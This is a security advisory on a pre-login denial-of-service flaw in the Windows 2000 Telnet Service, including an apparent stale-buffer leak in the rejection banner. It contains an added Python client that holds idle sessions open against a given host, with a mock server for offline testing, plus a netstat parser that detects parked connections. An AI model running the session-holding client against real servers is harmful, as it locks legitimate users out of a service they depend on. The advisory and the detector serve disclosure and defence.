COMMAND

    telnetd

SYSTEMS AFFECTED

    Windows 2000

PROBLEM

    Alexander Ivanchev found the following.  System environment:

        Windows 2000 Professional Final Build [Version 5.00.2195]
        Service Pack 1, all latest windowsupdate.com security updates
        (as of 11/08/2000)
        Telnet Service Build 5.00.99201.1

    a. DoS - The Telnet Service in question is vulnerable to a simple
       Denial of Service attack.  The problem apparently lies within
       the login routine of the daemon.  It can be demonstrated by
       telnetting to a machine running the specified version of the
       Telnet Service and simply waiting at the login/password prompt
       until the session timeout fires.  After the timeout the daemon
       does not reset the connection until the client sends a key, so
       a client that never sends anything keeps the session open
       indefinitely.  Because Windows 2000 Professional allows only one
       concurrent Telnet session, a single such idle connection locks
       every authorized user out of the service.  The problem was not
       tested against Server/Advanced Server/Datacenter, but it is
       believed that opening the maximum number of allowed sessions and
       never terminating them would have the same effect.  This
       constitutes a Denial of Service attack.  Where no limit is
       imposed on the number of Telnet sessions it should also be
       possible to exhaust server-side sockets the same way.  Note that
       the attacker needs no credentials: the connections are parked
       before any login takes place.
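    The following is an added example, not code from the advisory or
    from Microsoft, that reproduces the idle hold described in (a): it
    connects to port 23, refuses every Telnet option the server offers
    (the assumption being that the Windows 2000 daemon then falls back
    to the plain "login:" prompt shown above instead of NTLM
    negotiation), reads up to the prompt and then never sends a byte.
    The mock_w2k_telnetd helper is a constructed loopback stand-in that
    mimics the described behaviour (the session "times out" but the
    socket is only closed once a key arrives) so the client can be
    tried offline; host names, ports, the prompt string and the
    timeouts are assumptions.

```python
# Reproducer for the idle-session hold on the Windows 2000 Telnet Service (added example).
import socket
import sys
import threading
import time

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def negotiate(data):
    """Strip Telnet option negotiation from `data`; return (text, refusals to send back).
    DO <opt> is answered WONT <opt>, WILL <opt> is answered DONT <opt>, so the server
    gives up on its options and falls back to a plain login prompt."""
    text, reply, i = bytearray(), bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            text.append(data[i])
            i += 1
        elif i + 1 >= len(data):
            break                                   # sequence cut off at chunk end
        elif data[i + 1] == IAC:                    # escaped 0xFF data byte
            text.append(IAC)
            i += 2
        elif data[i + 1] == SB:                     # skip subnegotiation up to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif data[i + 1] in (DO, DONT, WILL, WONT) and i + 2 < len(data):
            cmd, opt = data[i + 1], data[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3
        else:                                       # other two-byte commands (NOP, GA, ...)
            i += 2
    return bytes(text), bytes(reply)


def hold_session(host, port=23, idle_seconds=600.0, timeout=10.0):
    """Connect, refuse every option, read up to the login prompt, then stay silent.
    Nothing is ever typed, so the daemon in the advisory never resets the socket.
    Returns the banner, whether the server closed the socket, and the hold time."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner, deadline = bytearray(), time.monotonic() + timeout
        while b"login:" not in bytes(banner).lower() and time.monotonic() < deadline:
            try:
                chunk = s.recv(1024)
            except socket.timeout:
                break
            if not chunk:
                return {"banner": bytes(banner), "reset_by_server": True, "held_seconds": 0.0}
            text, reply = negotiate(chunk)
            banner += text
            if reply:
                s.sendall(reply)
        # Idle at the prompt: recv() with a short timeout notices a server-side reset
        # without sending a byte that the daemon would treat as a key press.
        start, reset = time.monotonic(), False
        while time.monotonic() - start < idle_seconds:
            s.settimeout(max(0.05, min(1.0, idle_seconds - (time.monotonic() - start))))
            try:
                if s.recv(1024) == b"":
                    reset = True
                    break
            except socket.timeout:
                continue
            except OSError:                         # RST from the server
                reset = True
                break
        return {"banner": bytes(banner), "reset_by_server": reset,
                "held_seconds": time.monotonic() - start}


def mock_w2k_telnetd(session_timeout=0.5, reset_on_timeout=False):
    """Constructed loopback stand-in for the behaviour described in the advisory, so the
    client can be tried offline: send a login prompt, let the session 'time out', then
    keep the socket open until a key arrives (or close at the timeout if asked to)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            conn.sendall(b"Welcome to Microsoft Telnet Service\r\n\r\nlogin: ")
            time.sleep(session_timeout)             # the session timeout fires here...
            if not reset_on_timeout:
                conn.recv(1)                        # ...but the socket lives until a key arrives

    def serve():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":                          # no host given: demo against the stand-in
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = 23 if len(sys.argv) > 1 else mock_w2k_telnetd()
    print(hold_session(host, port, idle_seconds=float(sys.argv[2]) if len(sys.argv) > 2 else 30.0))
```

    Run with a target host and a hold time in seconds; without
    arguments it demonstrates the hold against the stand-in.  Opening
    several such sessions in parallel is how the session limit of the
    Server editions would be reached.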

    b. Possible code problem - On the Windows 2000 Professional machine
       on which the above vulnerability was tested, the following
       strange behaviour of the Telnet Service was observed.  While a
       session is established and not terminated, and the wait
       interval has not yet elapsed, attempts to open a second Telnet
       session fail with the following message:

        Microsoft Windows Workstation allows only 1 Telnet Client License
        Server has closed connection

        Connection to host lost.

       However, when a connection is attempted AFTER the session has
       timed out but before it has been reset, SOMETIMES the following
       is returned instead:

        ~r?q?LL>ECHELON?ECHELON?ECHELON?echelon?echelon
        Microsoft Windows Workstation allows only 1 Telnet Client License
        Server has closed connection

        Connection to host lost.

       where ECHELON is the hostname of the machine.  Needless to say,
       this does not look right: a rejection banner that carries
       non-printable bytes and repeated copies of the hostname looks
       like stale buffer contents being written to the client.  What
       the extra bytes are was not determined.

    c. Note: When a machine is under the above-described attack, the
       'List the current users' Telnet admin option will NOT report the
       parked connections, since no login has taken place, even though
       the number of allowed connections may already have been reached.
       The held connections are, of course, still visible to netstat or
       an equivalent utility as established TCP connections to port 23.
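    Since the admin tool's user list misses the parked connections
    while netstat shows them, the following added example (not from the
    advisory) parses Windows `netstat -an` output and counts, per
    remote host, the connections to the Telnet port that no entry in
    the 'List the current users' output accounts for.  SAMPLE_NETSTAT
    is constructed (modelled on a Server-class host with more than one
    permitted session), and it is assumed that the logged-in client
    addresses are available as a set of IP strings.

```python
# Spot pre-login Telnet holds that the 'List the current users' admin option misses
# (added example, not from the advisory). Parses Windows `netstat -an` output.
import subprocess
import sys


def telnet_connections(netstat_text, port=23):
    """Return (remote_ip, remote_port, state) for every TCP connection to local `port`.
    The LISTENING socket itself is skipped. Only the Windows `netstat -an` column layout
    (Proto, Local Address, Foreign Address, State) is handled."""
    found = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0].upper() != "TCP":
            continue
        local, remote, state = cols[1], cols[2], cols[3].upper()
        if local.rsplit(":", 1)[-1] != str(port) or state == "LISTENING":
            continue
        rip, rport = remote.rsplit(":", 1)
        found.append((rip, int(rport), state))
    return found


def pre_login_holds(netstat_text, logged_in_hosts, port=23):
    """Count Telnet-port connections per remote host that no logged-in user explains.
    `logged_in_hosts` is the set of client addresses shown by the Telnet admin tool's
    'List the current users' option (assumed to be available as IP strings). Anything
    in netstat but not in that set is a session parked at the login prompt."""
    counts = {}
    for rip, _rport, _state in telnet_connections(netstat_text, port):
        if rip not in logged_in_hosts:
            counts[rip] = counts.get(rip, 0) + 1
    return counts


# Constructed sample of `netstat -an` output on an attacked host, not captured data.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.1.10:23        192.168.1.55:1034      ESTABLISHED
  TCP    192.168.1.10:23        192.168.1.55:1041      ESTABLISHED
  TCP    192.168.1.10:23        192.168.1.20:2201      ESTABLISHED
  TCP    192.168.1.10:139       192.168.1.55:1035      ESTABLISHED
"""


if __name__ == "__main__":
    # `--live HOST...` reads the real netstat output; otherwise the constructed sample is used.
    live = len(sys.argv) > 1 and sys.argv[1] == "--live"
    text = subprocess.run(["netstat", "-an"], capture_output=True, text=True,
                          check=True).stdout if live else SAMPLE_NETSTAT
    logged_in = set(sys.argv[2:]) if live else {"192.168.1.20"}
    for ip, n in pre_login_holds(text, logged_in).items():
        print(f"{ip}: {n} connection(s) to port 23 with no login")
```

    On the sample, 192.168.1.20 is the one genuinely logged-in client,
    so the two connections from 192.168.1.55 are the parked sessions.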

SOLUTION

    Nothing yet.  Until a fix is available, the exposure can be reduced
    by stopping the Telnet Service where it is not needed, or by
    restricting access to TCP port 23 to trusted hosts at a packet
    filter.